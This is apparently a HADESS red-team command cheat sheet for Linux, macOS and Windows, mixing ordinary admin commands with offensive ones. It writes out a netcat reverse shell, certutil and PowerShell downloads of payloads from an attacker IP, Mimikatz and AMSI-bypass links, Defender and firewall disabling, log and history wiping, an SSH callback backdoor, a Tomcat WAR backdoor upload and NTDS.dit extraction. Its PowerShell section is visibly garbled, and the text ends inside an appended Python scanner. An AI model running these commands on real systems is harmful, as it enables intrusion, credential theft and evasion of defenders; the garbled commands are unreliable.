HADESS

Linux
Network commands

watch ss -tp
    Network communication
netstat -ant
    tcp or udp communication (-anu = udp)
netstat -tulpn
    Communication with PIDs
lsof -i
    Established communication
smb://ip/share
    SMB shared environment access
share user x.x.x.x C$
    Mount the shared Windows environment
smbclient -U user \\ip\share
    Connect to SMB
ifconfig eth# ip/cidr
    Set IP and netmask
ifconfig eth0:1 ip/cidr
    Virtual interface setting
route add default gw gwIp
    Set GW
ifconfig eth# mtu [size]
    Change the MTU size
export MAC=xx:xx:xx:xx:xx:xx
    Change the MAC
ifconfig int hw ether MAC
    Change the MAC
macchanger -m MAC int
    Change MAC in Backtrack
iwlist int scan
    Wi-Fi scanner
nc -lvp port
    Listening on a specific port
python3 -m http.server port
    Create a web server
dig -x ip
    Identifying the domains of an ip
host ip
    Identifying the domains of an ip
host -t SRV _service._tcp.url.com
    Identification of domain SRV records
dig @ip domain -t AXFR
    Identify DNS zone transfer
host -l domain namesvr
    Identify DNS zone transfer
ip xfrm state list
    Show available VPN
ip addr add ip/cidr dev eth0
    Add 'hidden' interface
cat /var/log/messages | grep DHCP
    DHCP list
tcpkill host ip and port port
    Blocking ip:port
echo "1" > /proc/sys/net/ipv4/ip_forward
    Enable IP forwarding
echo "nameserver x.x.x.x" > /etc/resolv.conf
    Add DNS server
showmount -e ip
    Show exported mount points
mkdir /site_backups; mount -t nfs ip:/ /site_backups
    Mount the NFS share exported by ip

System information

nbtstat -A ip
    Get hostname for ip
id
    Current username
w
    Logged in users
who -a
    User information
last -a
    The last logged in users
ps -ef
    Available system processes (or use top)
df -h
    The amount of disk usage (or use free)
uname -a
    Show the kernel version along with the processor architecture
mount
    Mount a file system (with no arguments, list the mounted file systems)
getent passwd
    Display the list of users
PATH=$PATH:/home/mypath
    Add a directory to PATH
kill pid
    Kill process with pid
cat /etc/issue
    Display operating system information
cat /etc/*release*
    Display operating system version information
cat /proc/version
    Display kernel version information
rpm --query --all
    Installed packages (in Redhat)
rpm -ivh *.rpm
    Installing rpm packages (-e to remove)
dpkg --get-selections
    Installed packages (in Ubuntu)
dpkg -i *.deb
    Install DEB packages (-r to remove)
pkginfo
    Installed packages (on Solaris)
which tcsh/csh/ksh/bash
    Display the paths of executable files
chmod -so tcsh/csh/ksh
    Disabling the other shells and forcing the use of bash
find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null
    Finding files with suid
find / -uid 0 -perm -4000 -type f 2>/dev/null
    Finding files with suid owned by root
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
    Show writable files

Functional commands

python -c "import pty;pty.spawn('/bin/bash')"
    Interactive shell
wget http://url -O url.txt -o /dev/null
    Get the address (save the page to url.txt)
rdesktop ip
    Access to the desktop of ip
scp /tmp/file user@x.x.x.x:/tmp/file
    Send file
scp user@remoteip:/tmp/file /tmp/file
    Get the file
useradd -m user
    Add user
passwd user
    Change user password
rmuser uname
    Delete user
script -a outfile
    Record the session: Ctrl-D to stop
apropos subject
    Related commands
history
    History of user commands
!num
    Execute line num of the history
ssh2john.py id_rsa > ssh-key
    Find the passphrase (convert the key for john)
john ssh-key
    Find the passphrase
ssh -i id_rsa user@ip
    Connect with key and passphrase
id -u
    Get user id
cut -d: -f3 < <(getent group GROUPNAME)
    Get group id
curl -G 'http://example.com/file.php' --data-urlencode 'cmd=echo ssh-rsa AA...'
    Sending information with the GET method in curl
curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file exploit.war "http://megahosting.com:8080/manager/text/deploy?path=/exploit.war"
    Create backdoor with LFI vulnerability in Java

File commands

diff file file2
    Compare two files
rm -rf dir
    Forced deletion of nested folders
shred -f -u file
    Overwrite and delete the file
touch -r ref file
    Match the timestamp of file to ref
touch -t YYYYMMDDhhmm file
    Set file timestamp
sudo fdisk -l
    List of connected drives
mount /dev/sda# /mnt/usbkey
    Mounting usb devices
md5sum -t file
    md5 hash of the file
echo -n "str" | md5sum
    Generate md5 hash of a string
sha1sum file
    The SHA1 hash of the file
sort -u
    Sort and display unique lines
grep -Hnri word * | vim -
    Search for the desired word in files along with the file name
grep -rial word
    Files containing the desired word
tar cf file.tar files
    Create tar from files
tar xf file.tar
    Extract tar
tar czf file.tar.gz files
    Create tar.gz
tar xzf file.tar.gz
    Extract tar.gz
tar cjf file.tar.bz2 files
    Create .tar.bz2
tar xjf file.tar.bz2
    Extract tar.bz2
gzip file
    Compress and rename the file
gzip -d file.gz
    Decompress file.gz
upx -9 -o out.exe orig.exe
    UPX-pack orig.exe into out.exe
zip -r zipname.zip \Directory\*
    Create zip
dd skip=1000 count=2000 bs=[size] if=file of=file
    Separate 1 to 3 KB from the file
split -b 9K file prefix
    Split the file into 9 KB sections
awk 'sub("$","\r")' unix.txt > win.txt
    Windows compatible txt file
find / -iname "*.pdf" -type f
    Search for PDF files
find / -perm -4000 -o -perm -2000 -exec ls -ldb {} \;
    Search setuid/setgid files
dos2unix file
    Switch to *nix format
file file
    Determine the file type and format
chattr (+/-)i file
    Setting or unsetting the immutable bit
while [ $? -eq 0 ]; do cd flag/; done
    Enter infinitely nested folders

Miscellaneous commands

unset HISTFILE
    Disable recording in history
ssh user@ip arecord - | aplay -
    Remote microphone recording
gcc -o outfile myfile.c
    Compile C, C++
init 6
    Restart (0 = shutdown)
cat /etc/*syslog*.conf | grep -v "^#"
    List of log files
grep 'href=' file | cut -d"/" -f3 | grep url.com | sort -u
    Extract the links (to url.com) from a file
dd if=/dev/urandom of=file bs=3145728 count=100
    Create a 3 MB file

Controller commands

echo "" > /var/log/auth.log
    Empty the auth.log file
echo "" > ~/.bash_history
    Empty the bash history of the current user
rm ~/.bash_history -rf
    Delete the file bash_history
history -c
    Delete the session history of the current user
export HISTFILESIZE=0
    Set the maximum lines of the history file to zero
export HISTSIZE=0
    Set the maximum number of commands in the history file to zero
unset HISTFILE
    Delete history (need to log in again to apply)
kill -9 $$
    Kill the current session
ln /dev/null ~/.bash_history -sf
    Permanently send all history commands to /dev/null
File system structure

/bin    System binary files
/boot   Files related to the boot process
/dev    Interfaces related to system devices
/etc    System configuration files
/home   A basic place for users and libraries
/opt    Essential software libraries
/proc   Executive and systemic processes
/root   The base path for the root user
/sbin   Executable files of the root user
/tmp    Temporary files
/usr    Not very necessary files
/var    System variable files

Important files

/etc/shadow
    Hashes of local users
/etc/passwd
    Local users
/etc/group
    Local groups
/etc/rc.d
    Startup services
/etc/init.d
    Services
/etc/hosts
    List of hostnames and IPs
/etc/HOSTNAME
    Show hostname along with domain
/etc/network/interfaces
    Network configuration
/etc/profile
    System environment variables
/etc/apt/sources.list
    List of ubuntu distribution sources
/etc/resolv.conf
    Nameserver settings
/home/user/.bash_history
    bash history (also in /root/)
/usr/share/wireshark/manuf
    MAC manufacturer
~/.ssh/
    Location of ssh keystores
/var/log
    System log files (for Linux)
/var/adm
    System log files (for Unix)
/var/spool/cron
    List of files in cron
/var/log/apache/access.log
    Apache access log
/etc/fstab
    Static file system information

Using powershell

Installation
sudo apt install gss-ntlmssp
sudo apt-get install powershell

Login using username and password
pwsh
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Cre
Enter-PSSession $offsec_session

Create symlink
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'
Script writing

Create ping sweep
for x in {1..254..1}; do ping -c 1 1.1.1.$x | grep "64 b" | cut -d" " -f4 >> ips.txt; done

Automating the domain name resolve process in a bash script
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1..254..1}; do
    host $range.$ip | grep "name pointer" | cut -d" "
done

Creating a fork bomb (creating processes until the system crashes)

DNS reverse lookup process
for ip in {1..254..1}; do dig -x 1.1.1.$ip | grep $ip >> dns.txt; done

IP banning script
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while [ $i -le 253 ]
do
    if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
        echo "BANNED: arp -s 192.168.1.$i"
        arp -s 192.168.1.$i 00:00:00:00:00:0a
    else
        echo "IP NOT BANNED: 192.168.1.$i"
    fi
    i=$((i+1))
done

Create SSH callback
Set up the script in crontab to call back every X minutes. It is highly recommended to set up a generic user on the red team computer (with no shell privileges). The script will use the private key (located on the callback source computer) to connect to a public key (on the red team computer). The red teamer then connects to the target via a local SSH session (in the example below, use ssh -p4040 localhost).
#!/bin/sh
# Callback: script located on callback source computer (target)
killall ssh >/dev/null 2>&1
sleep 5
REMLIS=4040
REMUSR=user
HOSTS="domain1.com domain2.com domain3.com"
for LIVEHOST in $HOSTS;
do
    COUNT=$(ping -c2 $LIVEHOST | grep 'received' | awk -F',' '{ print $2 }' | awk '{ print $1 }')
    if [ $COUNT -gt 0 ]; then
        ssh -R ${REMLIS}:localhost:22 -i "/home/${REMUSR}/.ssh/id_rsa" -N ${LIVEHOST} -l ${REMUSR}
    fi
done
Iptables command
Use ip6tables for IPv6.

iptables-save -c > file
    Extract iptables rules and save them to file
iptables-restore < file
    Restore iptables rules from file
iptables -L -v --line-numbers
    List of all rules with their line number
iptables -F
    Flush all rules
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP
    Change the policy applied when no rule matches
iptables -A INPUT -i interface -m state --state RELATED,ESTABLISHED -j ACCEPT
    Allow established connections on INPUT
iptables -D INPUT 7
    Delete rule number 7 of the INPUT chain
iptables -t raw -L -n
    Increase throughput by disabling statefulness
iptables -P INPUT DROP
    Drop all packets

Allow ssh on port 22 outbound
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i iface -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT

Allow ICMP outbound
iptables -A OUTPUT -o iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -i iface -p icmp --icmp-type echo-reply -j ACCEPT

Create port forward
echo "1" > /proc/sys/net/ipv4/ip_forward
# OR: sysctl net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d pivotip --dport 443 --to-destination attackip:443
iptables -t nat -A POSTROUTING -p tcp -o eth0 -j SNAT -s targetsubnetcidr -d attackip --dport 443 --to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT

Allow 1.1.1.0/24 on ports 80,443 and log dropped packets in /var/log/messages
iptables -A INPUT -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW -p tcp -m multiport --dports 80,443 -j ACCEPT
iptables -A INPUT -i eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o eth0 -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP
Update-rc.d

Check and create a launcher
service --status-all
    List of available services and their status ([+] service starts at boot, [-] service does not start)
service service start
    Start a service
service service stop
    Stop a service
service service status
    Check service status
update-rc.d -f service remove
    Remove the existing startup links of the service (-f forces removal even if the /etc/init.d file still exists)
update-rc.d service defaults
    Add the service to the system startup

Chkconfig
Available in Red Hat distributions such as CentOS and Oracle.
chkconfig --list
    List of available services and their status
chkconfig service --list
    The status of a service
chkconfig service on [--level 3]
    Add the service (its run level can also be specified)
chkconfig service off [--level 3]
    Remove the service (e.g. chkconfig iptables off)
Screen command

screen -S name
    Create a new screen with the name
screen -ls
    List of running screens
screen -r name
    Attach to the screen with the name
screen -S name -X cmd
    Send command to the screen with the name

C-a ?        List of key combinations (help)
C-a d        Detach
C-a D D      Detach and log out
C-a c        Create a new window
C-a C-a      Switch to the last window
C-a ' name   Switch to the window named name
C-a "        Show window list and change window
C-a k        Delete the current window
C-a S        Horizontal split of the display
C-a |        Vertical split of the display
C-a tab      Jump to the next region
C-a X        Delete the current region
C-a Q        Delete all regions except the current one
X11

Remote capture of an X11 display, converted to JPG
xwd -display ip:0 -root -out /tmp/test.xpm
xwud -in /tmp/test.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg

Dump X11 in stream mode
xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read the dumped file with xwudtopnm or GIMP

TCPDump command

Capture packets on eth0, show them in ASCII and hex, and save them to a file
tcpdump -i eth0 -XX -w out.pcap
Capture all port 80 traffic to 2.2.2.2
tcpdump -i eth0 port 80 dst 2.2.2.2
Show all IP connections to 192.168.1.22 from outside the local network
tcpdump -i eth0 -tttt dst 192.168.1.22 and not net 192.168.1.0/24
Show all ping replies
tcpdump -i eth0 'icmp[icmptype] = icmp-echoreply'
Capture 50 DNS packets and display the timestamp
tcpdump -i eth0 -c 50 -tttt 'udp and port 53'
Kali default commands

Equivalent to WMIC
wmis -U DOMAIN\user%password //DC cmd.exe /c command

Mount SMB shared space
# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs //ip/share /mnt/share -o user=user,pass=pass,sec=ntlmssp,domain=domain,rw

Kali update
apt-get update
apt-get upgrade

Checking the operating system for privilege escalation possibilities
https://github.com/rebootuser/LinEnum
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t

List of all processes with root access
https://github.com/DominicBreuker/pspy
For example: ./pspy64 -pf -i 1000
The pfSense command

pfSsh.php
    pfSense shell
pfSsh.php playback enableallowallwan
    Allow inbound connections on the WAN (adds an allow-all rule to the WAN rules)
pfSsh.php playback enablesshd
    Enable inbound/outbound ssh
pfctl -sn
    Show NAT rules
pfctl -sr
    Show filter rules
pfctl -sa
    Show all rules
viconfig
    Edit settings
rm /tmp/config.cache
    Remove the cached (backup) settings after editing
/etc/rc.reload_all
    Reload the entire configuration
Solaris operating system

ifconfig -a
    List of all interfaces
netstat -in
    List of all interfaces
ifconfig -r
    List of routes
ifconfig eth0 dhcp
    Start the DHCP client
ifconfig eth0 plumb up ip netmask nmask
    IP setting
route add default ip
    Gateway setting
logins -p
    List of users without passwords
svcs -a
    List of all services along with status
prstat -a
    Status of processes (also the command top)
svcadm start ssh
    Start the SSH service
inetadm -e telnet (-d for disable)
    telnet activation
prtconf | grep Memory
    Total physical memory
iostat -En
    Hard disk size
showrev -c /usr/bin/bash
    Binary information
shutdown -i6 -g0 -y
    Restart the system
dfmounts
    List of users connected to NFS
smc
    GUI management
snoop -d int -c pkt# -o results.pcap
    Packet capture
/etc/vfstab
    Mounted file system table
/var/adm/logging
    Log of login attempts
/etc/default/*
    Default settings
/etc/system
    Kernel modules and settings
/var/adm/messages
    syslog path
/etc/auto*
    Automounter settings file
/etc/inet/ipnodes
    IPv4 and IPv6 hosts file

Important cache files

~/.viminfo
    vim editor file
Mac

Situational awareness

top
    Shows real-time system statistics including CPU usage, memory usage, and running processes.
ps aux
    Displays a list of running processes with their associated details.
netstat
    Displays active network connections, routing tables, and a number of network interface and protocol statistics.
tcpdump
    Allows the capture and analysis of network traffic.
tail -f /var/log/system.log
    Displays real-time updates to the macOS system log.
log show --predicate 'process == "PROCESS_NAME"' --info
    Displays system log entries for a specific process.
fs_usage
    Shows real-time file system activity, including which files are being accessed and by which processes.
(command not legible in the source)
    Shows all active network connections and which processes are using them.
fseventer
    Displays a graphical representation of file system activity.
dtrace
    Allows the tracing and analysis of system events.
launchctl list
    Displays a list of all currently loaded launch daemons and agents.
User plist file enumeration

/Users/<username>/Library/Preferences/.GlobalPreferences.plist
    The user plist file for the currently logged-in user can be found here
/Users/<username>/Library/Preferences/
    Other user plist files can be found here
defaults read
    Read a plist file
defaults write
    Write a plist file
defaults delete
    Delete a key from a plist file
PlistBuddy -c "Open"
    Open a plist file
PlistBuddy -c "Print"
    Print a value from a plist file
PlistBuddy -c "Add"
    Add a new key-value pair to a plist file
PlistBuddy -c "Delete"
    Delete a key from a plist file
PlistBuddy -c "Set"
    Set the value of a key
plutil -lint
    Validate a plist file
plutil -convert xml1
    Convert a plist file to XML format

User & Group

sudo dscl . -create /Users/newusername
    Create a new user
sudo dscl . -passwd /Users/newusername password
    Set the user's password
sudo dscl . -append /Groups/admin GroupMembership newusername
    Make the user an administrator
sudo dseditgroup -o create "Group Name" groupname
    Create a new group
sudo dseditgroup -o edit -a username -t user groupname
    Add a user to the group
dscl . -read /Groups/groupname GroupMembership
    List the members of a group
sudo dseditgroup -o delete groupname
    Delete a group
sudo dseditgroup -o edit -d username -t user groupname
    Remove a user from a group
sudo dseditgroup -o edit -n newgroupname -r oldgroupname
    Rename a group

Windows

Versions

ID       Versions
NT 3.1   Windows NT 3.1 (All)
NT 3.5   Windows NT 3.5 (All)
NT 3.51  Windows NT 3.51 (All)
NT 4.0   Windows NT 4.0 (All)
NT 5.0   Windows 2000 (All)
NT 5.1   Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2   Windows XP (64-bit, Pro 64-bit), Windows Server 2003 & R2 (Standard, Enterprise), Windows Home Server
NT 6.0   Windows Vista (Starter, Home Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1   Windows 7 (Starter, Home, Pro, Enterprise, Ultimate), Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2   Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)), Windows Phone 8, Windows Server 2012 (Foundation, Essentials, Standard)
Files

%SYSTEMROOT%
    Usually C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts
    DNS entries
%SYSTEMROOT%\System32\drivers\etc\networks
    Network settings
%SYSTEMROOT%\System32\config\SAM
    Usernames and password hashes
%SYSTEMROOT%\repair\SAM
    Copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
    Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt
    Application logs
%WINDIR%\system32\config\SecEvent.Evt
    Security logs
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
    Startup path
%USERPROFILE%\Start Menu\Programs\Startup\
    Startup path
%SYSTEMROOT%\Prefetch
    Prefetch path (EXE logs)

Launcher paths

For Windows NT 6.1, 6.0
# All users
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
# Specific users
%SystemDrive%\Users\%UserName%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
For Windows NT 5.2, 5.1, 5.0
%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
For Windows 9x
%SystemDrive%\WINDOWS\Start Menu\Programs\Startup
For Windows NT 4.0, 3.51, 3.50
%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup
System information commands

ver
    Operating system version
sc query state=all
    Show services
tasklist /svc
    Show processes and services
tasklist /m
    Show all processes and DLLs
tasklist /S ip /v
    Remotely running processes
taskkill /PID pid /F
    Forced termination of the process
systeminfo /S ip /U domain\user /P Pwd
    Receive system information remotely
reg query \\ip\RegDomain\Key /v VALUE
    Send a query to the registry (/s = all values)
reg query HKLM /f password /t REG_SZ /s
    Registry search for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
    WSUS address
fsutil fsinfo drives
    List of drives (needs admin access)
dir /a /s /b c:\*.pdf*
    Search for all pdf files
dir /a /b c:\windows\kb*
    Search for patches
findstr /si password *.txt *.xml *.xls
    Search files for passwords
tree /F /A c: > tree.txt
    List of folders on drive C:
reg save HKLM\Security security.hive
    Save the security hive inside the file
echo %USERNAME%
    Current user
whoami /priv
    Current user permissions

net/domain commands

net view /domain
    Hosts in the current domain
net view /domain:[MYDOMAIN]
    Hosts in [MYDOMAIN]
net user /domain
    All users of the current domain
net user user pass /add
    Add user
net localgroup "Administrators" user /add
    Add user to Administrators
net accounts /domain
    Domain password policies
net localgroup "Administrators"
    List of local admins
net group /domain
    List of domain groups
net group "Domain Admins" /domain
    List of admin users in the domain
net group "Domain Controllers" /domain
    List of DCs for the current domain
net share
    SMB shares
net session | find "\\"
    List of active SMB sessions
net user user /ACTIVE:yes /domain
    Activate (unlock) the domain user
net user user "newpassword" /domain
    Change the domain user's password
net share share c:\share /GRANT:Everyone,FULL
    Share a folder
Remote commands

tasklist /S ip /v
    Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
    System information of ip
net share \\ip
    Shares of ip
net use \\ip
    Connect to ip
net use z: \\ip\share password /user:DOMAIN\user
    Map drive with specified credentials
reg add \\ip\regkey\value
    Add registry key on ip
sc \\ip create service binpath= C:\Windows\System32\x.exe start= auto
    Create a remote service (note the space after start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:\windows\temp\nc.exe
    Copy file from ip to the current system by cmd.exe
cmd.exe /c c:\windows\temp\nc.exe ip port -e cmd.exe
    Reverse shell
nc.exe -lvvp port
    Listen on a specific port
python3 -m http.server port
    Create webserver
xcopy /s \\ip\dir C:\local
    Copy the folder from ip
shutdown /m \\ip /r /t 0 /f
    Restart the system at ip

Network commands

ipconfig /all
    IP settings
ipconfig /displaydns
    DNS cache
netstat -ano
    Show connections
netstat -anop tcp 1
    Netstat loop (every second)
netstat -ano | findstr LISTENING
    Ports in use
route print
    Route tables
arp -a
    Get system MACs (using the ARP table)
nslookup, set type=any, ls -d domain > results.txt, exit
    Get DNS zone transfer
nslookup -type=SRV _www._tcp.url.com
    Get domain SRV lookup (ldap, kerberos, sip)
tftp -i ip GET remotefile
    File transfer with TFTP
netsh wlan show profiles
    Stored wireless network profiles
netsh firewall set opmode disable
    Firewall deactivation (old)
netsh wlan export profile folder=. key=clear
    Export wifi profiles with plaintext keys
netsh interface ip show interfaces
    List of IDs/MTUs of the interfaces
netsh interface ip set address local static ip nmask gw ID
    Set IP
netsh interface ip set dns local static ip
    DNS server configuration
netsh interface ip set address local dhcp
    Set interface to use DHCP
Functional commands

type file
    Show file contents
del path\*.* /a /s /q /f
    Delete files in the current path
find /I "str" filename
    Search for a string in a file
command | find /c /v ""
    Count the lines of a command's output
at HH:MM file [args] (i.e. at 14:45 cmd /c)
    Schedule file execution
runas /user:user "file [args]"
    Execute file as a specific user
shutdown /r /t 0
    Restart
sc stop UsoSvc
    Stop the UsoSvc service
sc start UsoSvc
    Start the UsoSvc service
sc config UsoSvc binpath= "C:\windows\system32\cmd.exe"
    Change the executable path of UsoSvc
tr -d "\15\32" < win.txt > unix.txt
    Delete CR & ^Z (*nix)
makecab file
    Compression
wusa.exe /uninstall /kb:####
    Delete patch
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true"
    Using the Event Viewer in the CLI
lusrmgr.msc
    Local user manager
services.msc
    Services control panel
taskmgr.exe
    Task manager
secpol.msc
    Security policy manager
eventvwr.msc
    Event viewer

Misc. commands

rundll32.exe user32.dll,LockWorkStation
    Locking the workstation

Disable Windows Firewall
netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off

Create port forward (*needs admin access)
netsh interface portproxy add v4tov4 listenport=3000 listenaddress=1.1.1.1 connectport=[port] connectaddress=[ip]
# Remove
netsh interface portproxy delete v4tov4 listenport=3000 listenaddress=1.1.1.1

Enable cmd
reg add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0
PsExec command

Remote file execution with specific credentials
psexec /accepteula \\targetIP -u domain\user -p password -c -f \\smbIP\share\file.exe
Execution of a command with a specific hash
psexec /accepteula \\ip -u Domain\user -p Lt1 c:\Program-1
Run a command on the remote system
psexec /accepteula \\ip -s cmd.exe

Terminal service (RDP)

Start RDP
Create regfile.reg with the following lines in it:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
"fDenyTSConnections"=dword:00000000
reg import regfile.reg
net start "termservice"
sc config termservice start= auto
net start termservice
or
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

RDP on port 443 (need to restart the terminal service)
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v

Remove network level authentication and add a firewall exception
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d "0" /f
netsh firewall set service type = remotedesktop mode = enable

Import task from XML file
schtasks.exe /create /tn MyTask /xml "C:\MyTask.xml" /f
WMIC command

wmic [alias] get /?
    List of all features
wmic [alias] call /?
    Callable methods
wmic process list full
    Process properties
wmic startup
    Startup programs
wmic service
    Services
wmic ntdomain list
    Domain and DC information
wmic qfe
    List of all patches
wmic process call create "process_name"
    Run process
wmic process where name="process" call terminate
    Kill process
wmic logicaldisk get description,name
    Display logical drives
wmic cpu get DataWidth /format:list
    Show whether the system is 32-bit or 64-bit
wmic service where started=true get name,startname
    Show running services
WMIC [alias] [where] [clause]
    [alias] == process, share, startup, service, nicconfig, useraccount, etc.
    [where] == where (name="cmd.exe"), where (parentprocessid!="[pid]"), etc.
    [clause] == list [full|brief], get [attrib1, attrib2], call [method], delete

Run a file from SMB with specific credentials
wmic /node:targetIP /user:domain\user /password:password process call create "\\smbIP\share\file.exe"

Remove software
wmic product get name /value    # Get software names
wmic product where name="XXX" call uninstall /nointeractive

Remote user access
wmic /node:remotecomputer computersystem get username

Show processes in real time
wmic /node:machinename process list brief /every:1

Start RDP
wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

Number of times a user has logged on
wmic netlogin where (name like "%adm%") get numberoflogons

Search services for unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """

Volume shadow copy
1. wmic /node:DCIP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
# If any copies already exist then exfil, otherwise create using the following commands. Check output.txt for any errors
2. wmic /node:DCIP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
3. wmic /node:DCIP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\Syste C:\temp\system.hive 2>&1 > C:\temp\output.txt"
4. wmic /node:DCIP /user:"DOMAIN\user" /password:"PASS" process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1 > C:\temp\output.txt"
Step by step instructions on room362.com for the step below
5. From Linux, download and run ntdsxtract and libesedb to export hashes or other domain information
   a. Additional instructions found under the VSSOWN section
   b. ntdsxtract - http://www.ntdsxtract.com
POWERSHELL environment
Command
stop-transcript
get-content file
get-help command-examples
get-command ‘string’
get-service
get-wmiobject -class win32 service
$PSVersionTable
powershell.exe version 2.0Command
get-service measure-object
get-psdrive
get-process select -expandproperty name
get-help '-parameter credential
get-wmiobject -list -'network'
(Net.DNS]: :GetnostEntry(" ip "I
powershell.exe wget "http://10.10.10.10/nc.exe" -outfile "c:\temp\nc.exe"
poweshell.exe -c "IEX (New-Object System.Net WebClient).DownloadString('http://10.10.10.10:8000/1
cmd
https:/gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fddeO7dde6fad4ed/raw/8078a5 1bbfalt
https://rawgithubusercontent.com/PowerShellMatia/PowerSploit/master/Exfiltration/Invoke-Mimikatz
call pst filesCommand
Bypass AMSI
Inport-Module .\Invoke-Obfuscation\Invoke-obfuscation.psm1
Out-ObfuscatedTokenConmand -Path .\powerview.ps1 | Out-File out
or
https: //raw.githubusercontent. com/kmkz/Pentesting/master/ANSI-Bypass. ps1
+ + \AMSI-Bypass. ps1
Invoke-Ans iBypass
Disable realtimemonitoring
powershell -conmand set-mpppreference -Disable realtimemonitoring $true
List of all users
Susers = New-Object DirectoryServices .DirectorySearcher
Susers. Filter = "(&(objectclass=user))"
Susers.SearchRoot = ''
Susers. FindALL()
List of all domains
Sconputers = New-Object DirectoryServices.DirectorySearcher
Sconputers.Filter = "(&(objectclass=computer))"
Scomputers.SearchRoot = ''
Scomputers.FindALL()
Get AD credentials using donotrequirepreauth
Set-ADAccountControl —identity jorden -doesnotrequirepreauth 1Deleting security reports and programs (for SVRO1)
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVRO1
Extract the version of the operating system inside the CSV file
Get-WimiObject -class win32 operatingsystem | select -property ' |
export-csv c:\os.txt
List of running services
Get-Service | where_object {$_.status -eq “Running"}
Using ps drive for permanent sharing
New-PSJrive -Persist -PSProvider FileSjstem -Root \\1.1.1-1\tools -Name i
Files written on 8/20
Get-Childiten Path c:\ Force —Rec~rse —Filter ‘. log —ErrorAction
SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}
Get file from http
(new-object sjstem.net.webcLient).downloadFile(''url'', "dest!
TCP port connections (scanner)
$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {try {$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);} catch {}; if ($socket -eq $NULL) {echo $ip":"$port" - Closed";} else {echo $ip":"$port" - Open"; $socket=$NULL;}}
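The one-liner above only knows "open" and "closed" and has no timeout, so a firewalled port stalls it for the operating system's default connect timeout. The following is an added example, not part of the original cheat sheet, written in Python so it runs unchanged from a Linux attack box or a Windows host: a connect scanner with a per-port timeout and a thread pool that also separates refused (closed) from timed-out (filtered) ports. The two listener helpers exist only so the scanner can be exercised against loopback; the target host and port list are assumptions.

```python
"""TCP connect scanner with timeout and concurrency (added example,
Python standard library only; not from the original cheat sheet)."""
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, Tuple


def probe(host: str, port: int, timeout: float = 0.5) -> str:
    """Classify one port: open (SYN/ACK), closed (RST -> ECONNREFUSED),
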